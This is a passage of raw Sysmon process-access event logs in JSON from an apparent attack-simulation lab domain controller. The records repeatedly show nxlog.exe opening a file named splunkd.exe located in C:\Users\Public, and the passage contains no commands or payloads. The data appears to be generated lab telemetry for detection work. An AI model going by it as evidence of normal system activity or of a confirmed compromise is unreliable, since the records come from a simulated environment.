C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:32.391","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3157,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:33.393\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:33.393","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3158,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:34.395\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:34.395","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:35","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3159,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:35.396\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:35.396","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3160,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:36.398\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:36.398","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3161,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:37.399\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:37.399","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3162,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:38.401\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:38.401","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files 